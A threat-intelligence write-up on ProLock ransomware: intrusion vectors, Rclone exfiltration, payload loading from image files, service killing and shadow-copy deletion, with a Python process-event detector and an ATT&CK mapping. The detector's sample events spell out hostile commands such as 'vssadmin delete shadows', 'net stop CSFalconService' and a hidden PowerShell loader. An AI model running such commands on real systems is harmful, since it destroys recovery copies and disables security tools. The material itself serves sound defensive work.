ProLock ransomware, previously known as PwndLocker, was released in March 2020 with advanced capabilities. This evolved ransomware had begun operating in the latter part of 2019 and was primarily responsible for the attacks targeting ATM manufacturer Diebold Nixdorf and the US state of Illinois. It encrypts files with the RSA-2048 algorithm, appends the “.proLock” extension to the name of every encrypted file, and then drops a ransom message.
ProLock ransomware operators gain access to victim networks through the Qakbot (Qbot) info-stealer botnet, which is itself capable of spreading laterally across a network. Unprotected RDP servers are another intrusion vector.
In the past, ProLock has targeted multiple sectors including construction, finance, healthcare, and legal. The malware was also used in attacks aimed at US government agencies and industrial entities. For exfiltration, ProLock operators use a legitimate command-line tool, Rclone, which copies and syncs files to and from cloud storage providers such as OneDrive, Google Drive, and Mega. The Rclone executable is always renamed to resemble a legitimate system binary. The operators’ ransom demands range from $175,000 to more than $660,000 worth of Bitcoin (Fig. 1).
Microsoft’s task automation and configuration management framework, PowerShell, is used to extract the binary from a PNG or JPG file and inject it into memory. ProLock kills processes from an embedded list and stops services, including security-related ones such as CSFalconService, using the net stop command. It then uses the Windows vssadmin utility to delete volume shadow copies and to limit the shadow storage size so that no new copies can be created (Fig. 2).
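The behaviours described above (renamed Rclone, net stop of security services, vssadmin shadow-copy removal, PowerShell loading a payload from an image file) can be turned into process-creation detections. The following is an added example written for this article, not code from the original report or from any vendor; the event records are constructed, Sysmon-style samples, and the service-name list is an assumption that a defender would extend with their own EDR and AV service names.

```python
import re
from typing import Dict, List

# Constructed process-creation events (hypothetical sample data, Sysmon Event ID 1 style).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\vssadmin.exe", "OriginalFileName": "VSSADMIN.EXE",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "OriginalFileName": "VSSADMIN.EXE",
     "CommandLine": "vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB"},
    {"Image": r"C:\Windows\System32\net.exe", "OriginalFileName": "net.exe",
     "CommandLine": "net stop CSFalconService"},
    {"Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": "svchost.exe copy C:\\Finance remote:backup -q"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -f C:\\Users\\Public\\WinMgr.jpg"},
    {"Image": r"C:\Windows\explorer.exe", "OriginalFileName": "EXPLORER.EXE",
     "CommandLine": "explorer.exe"},
]

# Assumed list of security services worth alerting on; CSFalconService is the one named in the text.
SECURITY_SERVICES = {"csfalconservice", "windefend", "sense"}
VSS_PATTERNS = [re.compile(r"\bdelete\s+shadows\b", re.I),
                re.compile(r"\bresize\s+shadowstorage\b", re.I)]
NET_STOP = re.compile(r"\s*net1?(?:\.exe)?\s+stop\s+(\S+)", re.I)
IMAGE_FILE = re.compile(r"\.(?:png|jpe?g)\b", re.I)


def detect(event: Dict[str, str]) -> List[str]:
    """Return a list of findings for one process-creation event (empty if benign)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event["CommandLine"]
    findings: List[str] = []
    if image == "vssadmin.exe" and any(p.search(cmd) for p in VSS_PATTERNS):
        findings.append("vssadmin shadow copy deletion or storage resizing")
    if image in ("net.exe", "net1.exe"):
        m = NET_STOP.match(cmd)
        if m and m.group(1).lower() in SECURITY_SERVICES:
            findings.append(f"net stop of security service {m.group(1)}")
    if original == "rclone.exe" and image != "rclone.exe":
        findings.append(f"renamed rclone binary running as {image}")
    if image in ("powershell.exe", "pwsh.exe") and IMAGE_FILE.search(cmd):
        findings.append("PowerShell referencing an image file (embedded payload loader pattern)")
    return findings


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> findings, keeping only events that triggered a detection."""
    return {i: f for i, e in enumerate(events) if (f := detect(e))}
```

The OriginalFileName check catches the renamed Rclone binary because the PE version resource still names the tool even when the file on disk has been renamed; services with spaces in their names would need quoted-argument handling.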
MITRE ATT&CK Mapping
External Remote Services (T1133), Spearphishing Attachment (T1193), Spearphishing Link (T1192)
PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)